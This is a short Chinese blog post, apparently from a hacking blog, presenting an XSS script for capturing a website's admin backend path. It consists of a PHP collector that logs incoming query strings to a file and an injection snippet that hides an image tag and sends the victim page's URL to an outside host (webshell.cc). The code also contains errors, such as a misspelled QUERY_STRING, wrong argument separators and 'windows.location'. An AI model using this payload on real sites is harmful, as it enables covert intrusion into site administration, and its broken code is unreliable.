XSS截获网站后台路径脚本
cook.php
<?
$info = $_SERVER['QUSEY_STRING'];
if ($info) {
$fp = fopen("info.txt"."a");
fwrite($fp.$info."\n");
fclose($fp);
}
?>
使用代码:
插入:
<img name="ak" width=0 height=0 border=0></img><script>document.ak.src="https://www.webshell.cc/cook.php?"+windows.location.href;</script>
附件下载地址:tujing
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/882.html